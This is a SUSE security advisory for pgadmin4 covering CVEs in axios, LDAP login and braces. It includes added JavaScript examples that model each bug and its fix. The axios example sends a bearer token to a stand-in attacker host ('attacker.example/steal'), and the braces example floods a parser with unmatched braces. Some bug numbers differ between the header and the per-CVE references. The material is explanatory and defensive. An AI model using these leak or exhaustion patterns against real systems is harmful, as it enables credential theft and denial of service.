Description
Security update for pgadmin4
This update for pgadmin4 fixes the following issues:
- CVE-2025-27152: Fixed SSRF and credential leakage caused by axios sending requests to an absolute URL even when baseURL is set (bsc#1239308)
- CVE-2023-1907: Fixed an issue which could result in users being attached to another user's session if two users authenticate simultaneously via LDAP (bsc#1234840)
- CVE-2024-4068: Fixed possible memory exhaustion when parsing imbalanced braces (bsc#1224295)
Package List
SUSE Enterprise Storage 7.1
SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS
SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS
SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS
SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS
SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS
SUSE Linux Enterprise Module for Python 3 15 SP6
SUSE Linux Enterprise Server 15 SP3-LTSS
SUSE Linux Enterprise Server 15 SP4-LTSS
SUSE Linux Enterprise Server 15 SP5-LTSS
SUSE Linux Enterprise Server for SAP Applications 15 SP3
SUSE Linux Enterprise Server for SAP Applications 15 SP4
SUSE Linux Enterprise Server for SAP Applications 15 SP5
SUSE Manager Proxy 4.3
SUSE Manager Server 4.3
References
- Link for SUSE-SU-2025:1326-1
- E-Mail link for SUSE-SU-2025:1326-1
- SUSE Security Ratings
- SUSE Bug 1224295
- SUSE Bug 1234840
- SUSE Bug 1239308
- SUSE CVE CVE-2023-1907 page
- SUSE CVE CVE-2024-4068 page
- SUSE CVE CVE-2025-27152 page
Description
A vulnerability was found in pgadmin. Users logging into pgAdmin running in server mode using LDAP authentication may be attached to another user's session if multiple connection attempts occur simultaneously.
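The following is an added, illustrative model of the class of bug described above; it is not pgAdmin's code and makes no claim about how pgAdmin's LDAP module is written. It contrasts an authenticator that keeps the user being authenticated in state shared by every login in flight (SharedStateAuth) with one that keeps it local to the request (PerRequestAuth). FakeLdap, the in-memory directory and the user names are all constructed for the example; bind results are delivered later, standing in for network round-trips, so two logins overlap deterministically.

```javascript
// Constructed directory of test users; a real deployment binds against LDAP.
const directory = { alice: 'alice-pw', bob: 'bob-pw' };

// Fake LDAP server whose bind results are delivered later, in an order the
// caller controls, standing in for out-of-order network round-trips.
class FakeLdap {
  constructor() { this.inflight = []; }
  bind(username, password, callback) {
    this.inflight.push(() => callback(directory[username] === password));
  }
  // Deliver pending bind results; `order` lists indices into inflight.
  deliver(order) {
    for (const i of order) this.inflight[i]();
    this.inflight = [];
  }
}

// Vulnerable shape: the user under authentication lives in a field shared by
// every login attempt that is currently in flight.
class SharedStateAuth {
  constructor(ldap) { this.ldap = ldap; this.pendingUser = null; this.sessions = []; }
  login(username, password) {
    this.pendingUser = username;                 // shared across all logins in flight
    this.ldap.bind(username, password, ok => {
      if (!ok) return;
      // BUG: another login may have replaced pendingUser since bind() was issued,
      // so the session is created for the wrong user.
      this.sessions.push({ authenticatedAs: username, sessionFor: this.pendingUser });
    });
  }
}

// Fixed shape: everything the callback needs is captured per login attempt.
class PerRequestAuth {
  constructor(ldap) { this.ldap = ldap; this.sessions = []; }
  login(username, password) {
    const pendingUser = username;                // local to this login attempt
    this.ldap.bind(username, password, ok => {
      if (!ok) return;
      this.sessions.push({ authenticatedAs: username, sessionFor: pendingUser });
    });
  }
}

// Two users log in while each other's bind is in flight. Returns the sessions
// the authenticator created.
function simulateConcurrentLogins(AuthClass) {
  const ldap = new FakeLdap();
  const auth = new AuthClass(ldap);
  auth.login('alice', 'alice-pw');
  auth.login('bob', 'bob-pw');
  ldap.deliver([0, 1]);   // alice's bind result arrives first, then bob's
  return auth.sessions;
}

// Invariant every created session must satisfy.
function sessionsConsistent(sessions) {
  return sessions.length > 0 && sessions.every(s => s.authenticatedAs === s.sessionFor);
}

console.log('shared state :', simulateConcurrentLogins(SharedStateAuth));
console.log('per request  :', simulateConcurrentLogins(PerRequestAuth));
```

With SharedStateAuth, alice's bind succeeds but the session is issued for bob, because bob's login overwrote the shared field before alice's result came back; the same class of bug appears whenever authentication state is kept in module-level or class-level variables in a server that handles requests concurrently.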
Affected Products
References
- CVE-2023-1907
- SUSE Bug 1234840
Description
The NPM package `braces`, versions prior to 3.0.3, fails to limit the number of characters it can handle, which could lead to memory exhaustion. In `lib/parse.js`, if a malicious user sends "imbalanced braces" as input, the parsing enters a loop that keeps allocating heap memory without freeing it at any point of the loop. Eventually the JavaScript heap limit is reached and the program crashes.
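The following added example is not the braces package's code; it is a miniature model of the failure mode next to the kind of bounded front door that prevents it. parseUnbounded opens a node for every '{' and only releases it when the matching '}' arrives, so imbalanced input keeps it allocating; checkBraceInput is a single O(n) scan with O(1) state that rejects oversized or imbalanced input before any parsing happens. The constant MAX_INPUT_LENGTH and all function names are this example's own.

```javascript
// Example's own cap on input size; upstream braces 3.0.3 also bounds input
// length, but the constant name here is an assumption of this example.
const MAX_INPUT_LENGTH = 1024 * 64;

// Unbounded parser: every '{' allocates a node that stays live until its '}'.
// With N unmatched '{' the stack (and the AST) grows to N nodes.
function parseUnbounded(input) {
  const stack = [{ type: 'root', nodes: [] }];
  for (const ch of input) {
    const top = stack[stack.length - 1];
    if (ch === '{') {
      const node = { type: 'brace', nodes: [] };
      top.nodes.push(node);
      stack.push(node);
    } else if (ch === '}' && stack.length > 1) {
      stack.pop();
    } else {
      top.nodes.push({ type: 'text', value: ch });
    }
  }
  return { ast: stack[0], unclosed: stack.length - 1 };
}

// Bounded guard: checks size and brace balance without allocating per character.
// Backslash escapes the following character, as in shell brace patterns.
function checkBraceInput(input, maxLength = MAX_INPUT_LENGTH) {
  if (typeof input !== 'string') return { ok: false, reason: 'input is not a string' };
  if (input.length > maxLength) {
    return { ok: false, reason: `input length ${input.length} exceeds ${maxLength}` };
  }
  let depth = 0;
  for (let i = 0; i < input.length; i++) {
    const ch = input[i];
    if (ch === '\\') { i++; continue; }          // skip the escaped character
    if (ch === '{') {
      depth++;
    } else if (ch === '}') {
      if (depth === 0) return { ok: false, reason: `unexpected '}' at offset ${i}` };
      depth--;
    }
  }
  if (depth !== 0) return { ok: false, reason: `${depth} unclosed '{'` };
  return { ok: true, reason: null };
}

// Parser with the guard in front: untrusted input is rejected before it can
// drive the allocation loop.
function parseBounded(input, maxLength = MAX_INPUT_LENGTH) {
  const check = checkBraceInput(input, maxLength);
  if (!check.ok) throw new SyntaxError(check.reason);
  return parseUnbounded(input);
}

// Constructed inputs: a benign pattern and an imbalanced one.
console.log(parseUnbounded('a{b,c}d').unclosed);            // 0
console.log(parseUnbounded('{'.repeat(100000)).unclosed);   // 100000 live nodes
console.log(checkBraceInput('{'.repeat(100000)));           // rejected: over length
console.log(checkBraceInput('{'.repeat(10)));               // rejected: unclosed
```

Rejecting imbalanced braces outright is stricter than the real library, which treats unmatched braces as literal text; the point of the guard is that its cost and state are bounded regardless of input, so an attacker cannot turn input size into heap growth.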
Affected Products
References
- CVE-2024-4068
- SUSE Bug 1224256
Description
axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2.
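The following added example is not axios's code. It reimplements, stand-alone and offline, the URL-combining behaviour the advisory describes (an absolute or protocol-relative request URL wins over baseURL) and shows why that leaks the client's credentials to whatever host the caller-supplied URL names. It then shows a guard that pins every outgoing request to the baseURL's origin. The helper names (isAbsoluteURL, combineURLs, buildFullPath, buildPinnedPath, prepareRequest) and the hosts and token are this example's own.

```javascript
// Absolute ("https://host/...") and protocol-relative ("//host/...") URLs
// both name a host of the caller's choosing, so both are treated as absolute.
function isAbsoluteURL(url) {
  return /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);
}

// Join a base URL and a relative path with exactly one slash between them.
function combineURLs(baseURL, relativeURL) {
  return relativeURL
    ? baseURL.replace(/\/?\/$/, '') + '/' + relativeURL.replace(/^\/+/, '')
    : baseURL;
}

// Pre-fix behaviour: baseURL is only used when the requested URL is relative.
function buildFullPath(baseURL, requestedURL) {
  if (baseURL && !isAbsoluteURL(requestedURL)) {
    return combineURLs(baseURL, requestedURL);
  }
  return requestedURL;
}

// Models a client that attaches a bearer token to every request it sends.
// Whatever URL buildFullPath returns, the token goes with it.
function prepareRequest(config) {
  return {
    url: buildFullPath(config.baseURL, config.url),
    headers: { Authorization: `Bearer ${config.token}` },
  };
}

// Hardened variant: resolve the final URL and refuse anything whose origin
// differs from the configured baseURL's origin.
function buildPinnedPath(baseURL, requestedURL) {
  const base = new URL(baseURL);
  const target = new URL(buildFullPath(baseURL, requestedURL), base);
  if (target.origin !== base.origin) {
    return { ok: false, url: null, reason: `request to ${target.origin} leaves ${base.origin}` };
  }
  return { ok: true, url: target.href, reason: null };
}

// Constructed configuration: an internal API and a token that must not leave it.
const client = { baseURL: 'http://api.internal/v1', token: 'constructed-secret-token' };

// Relative path: goes where the operator intended.
console.log(prepareRequest({ ...client, url: '/users' }).url);
// Attacker-influenced absolute URL: the token is sent to attacker.example.
console.log(prepareRequest({ ...client, url: 'http://attacker.example/steal' }));
// Pinned variant refuses both absolute and protocol-relative escapes.
console.log(buildPinnedPath(client.baseURL, 'http://attacker.example/steal'));
console.log(buildPinnedPath(client.baseURL, '//attacker.example/steal'));
console.log(buildPinnedPath(client.baseURL, '/users'));
```

The SSRF and credential-leak risk arises whenever the request path comes from untrusted input (a query parameter, a redirect target, a webhook URL); setting baseURL alone does not constrain it, so the origin check has to be explicit, as above, or the client has to be configured to refuse absolute URLs.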
Affected Products
References
- CVE-2025-27152
- SUSE Bug 1239305